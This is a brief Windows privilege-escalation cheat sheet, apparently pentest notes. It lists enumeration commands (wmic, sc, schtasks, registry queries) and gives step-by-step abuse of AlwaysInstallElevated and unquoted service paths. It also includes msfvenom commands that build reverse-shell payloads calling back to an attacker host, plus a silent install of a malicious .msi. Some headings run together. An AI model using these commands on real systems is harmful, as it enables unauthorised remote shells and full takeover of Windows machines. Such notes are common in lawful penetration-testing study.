Privileges Escalation
Vulnerable Software
1) wmic product get name,version,vendor
2) wmic service list brief | findstr "Running"
3) sc qc SERVICENAME
4) Searchsploit, metasploit, Exploit-db, Github, GoogleQuick Wins
1) schtasks /query /fo LIST /v
2) AlwaysInstallElevated (Malicious .msi)
1- reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
2- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
3- msfvenom -p windows/x64/shell_reverse_tcpLHOST=ATTACKING_10.10.65.26 LPORT=LOCAL_PORT -f msi -o malicious.msi
4- msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi Unquoted Service Path
1) wmic service get name,displayname,pathname,startmode
2) check if can write to folder in path
3) msfvenom -p windows/x64/shell_reverse_tcp LHOST=[KALI or AttackBox IP Address] LPORT=[The Port to which the reverse shell will connect] -f exe > executable_name.exe
4) sc start unquotedsvcDLL Hijacking
Last updated
Was this helpful?